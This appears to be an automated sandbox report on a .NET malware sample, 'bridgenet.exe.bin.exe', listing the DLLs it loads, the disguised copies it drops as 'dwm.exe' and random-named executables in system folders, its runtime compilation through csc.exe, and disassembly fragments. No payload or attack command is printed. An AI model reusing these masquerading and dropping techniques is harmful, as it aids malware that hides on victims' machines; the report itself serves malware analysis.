Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: rasman.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: propsys.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: edputil.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: slc.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: userenv.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: sppc.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: apphelp.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: version.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: wldp.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: profapi.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: ktmw32.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: rasapi32.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: rasman.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: rtutils.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: mswsock.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: winhttp.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: dnsapi.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: winnsi.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: propsys.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: dlnashext.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: wpdshext.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: edputil.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: netutils.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: wintypes.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: appresolver.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: slc.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: userenv.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: sppc.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: amsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wscapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: netutils.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: slc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sppc.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: mscoree.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: version.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: uxtheme.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: windows.storage.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: wldp.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: profapi.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: cryptsp.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: rsaenh.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: cryptbase.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: sspicli.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: ktmw32.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: rasapi32.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: rasman.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: rtutils.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: mswsock.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: winhttp.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: dnsapi.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: winnsi.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: propsys.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: apphelp.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: dlnashext.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: wpdshext.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: edputil.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: urlmon.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: iertutil.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: srvcli.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: netutils.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: wintypes.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: appresolver.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: slc.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: userenv.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: sppc.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: rasman.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: propsys.dll

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Directory created: C:\Program Files\Windows Photo Viewer\en-GB\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Directory created: C:\Program Files\Windows Photo Viewer\en-GB\ed3206c147f2f1	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Directory created: C:\Program Files\Internet Explorer\images\dwm.exe	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Directory created: C:\Program Files\Internet Explorer\images\6cb0b6c459d5d3	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Directory created: C:\Program Files\Windows Photo Viewer\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Directory created: C:\Program Files\Windows Photo Viewer\ed3206c147f2f1	Jump to behavior

Source: bridgenet.exe.bin.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: bridgenet.exe.bin.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: bridgenet.exe.bin.exe

Static file information: File size 1685504 > 1048576

Source: bridgenet.exe.bin.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x19b000

Source: bridgenet.exe.bin.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\5z3arsde\5z3arsde.pdb source: bridgenet.exe.bin.exe, 00000000.00000002.1392935166.000000000387E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\xb2ojpgu\xb2ojpgu.pdb source: bridgenet.exe.bin.exe, 00000000.00000002.1392935166.000000000387E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\5z3arsde\5z3arsde.pdbHBL source: bridgenet.exe.bin.exe, 00000000.00000002.1392935166.000000000387E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000001A.00000002.1805396503.000000001B8C4000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000003A.00000002.2229404359.000000001B6B6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.pdb source: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000002B.00000002.1972756001.000000001BAB5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000001A.00000002.1805396503.000000001B8C4000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000003A.00000002.2229404359.000000001B6B6000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xb2ojpgu\xb2ojpgu.cmdline"
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5z3arsde\5z3arsde.cmdline"
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xb2ojpgu\xb2ojpgu.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5z3arsde\5z3arsde.cmdline"	Jump to behavior

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 0_2_00007FF887DA3B06 push ss; retf	0_2_00007FF887DA3B07
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 0_2_00007FF888142106 push E813037Eh; iretd	0_2_00007FF88814210D
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 13_2_00007FF887D33B06 push ss; retf	13_2_00007FF887D33B07
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 14_2_00007FF887D63B06 push ss; retf	14_2_00007FF887D63B07
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 19_2_00007FF887D56D0E pushad ; iretd	19_2_00007FF887D56D1D
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 19_2_00007FF887D33B06 push ss; retf	19_2_00007FF887D33B07
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 19_2_00007FF887D492A6 push ss; retf	19_2_00007FF887D492A9
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Code function: 20_2_00007FF887D492A6 push ss; retf	20_2_00007FF887D492A9
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Code function: 20_2_00007FF887D56D0E pushad ; iretd	20_2_00007FF887D56D1D
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Code function: 20_2_00007FF887D33B06 push ss; retf	20_2_00007FF887D33B07
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 21_2_00007FF887D33B06 push ss; retf	21_2_00007FF887D33B07
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 21_2_00007FF887D56D0E pushad ; iretd	21_2_00007FF887D56D1D
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 21_2_00007FF887D492A6 push ss; retf	21_2_00007FF887D492A9
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 26_2_00007FF887EA00BD pushad ; iretd	26_2_00007FF887EA00C1
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 26_2_00007FF887EA3B06 push ss; retf	26_2_00007FF887EA3B07
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 31_2_00007FF887E900BD pushad ; iretd	31_2_00007FF887E900C1
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 31_2_00007FF887E93B06 push ss; retf	31_2_00007FF887E93B07
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Code function: 36_2_00007FF887E800BD pushad ; iretd	36_2_00007FF887E800C1
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Code function: 36_2_00007FF887E83B06 push ss; retf	36_2_00007FF887E83B07
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 43_2_00007FF887EC00BD pushad ; iretd	43_2_00007FF887EC00C1
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 43_2_00007FF887EC3B06 push ss; retf	43_2_00007FF887EC3B07
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 48_2_00007FF887E800BD pushad ; iretd	48_2_00007FF887E800C1
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 48_2_00007FF887E83B06 push ss; retf	48_2_00007FF887E83B07
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 48_2_00007FF887E992A6 push ss; retf	48_2_00007FF887E992A9
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 48_2_00007FF887EA6D0E pushad ; iretd	48_2_00007FF887EA6D1D
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 49_2_00007FF887EB92A6 push ss; retf	49_2_00007FF887EB92A9
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 49_2_00007FF887EC6D0E pushad ; iretd	49_2_00007FF887EC6D1D
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 49_2_00007FF887EA00BD pushad ; iretd	49_2_00007FF887EA00C1
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Code function: 49_2_00007FF887EA3B06 push ss; retf	49_2_00007FF887EA3B07
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Code function: 54_2_00007FF887EC6D0E pushad ; iretd	54_2_00007FF887EC6D1D
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Code function: 54_2_00007FF887EB92A6 push ss; retf	54_2_00007FF887EB92A9

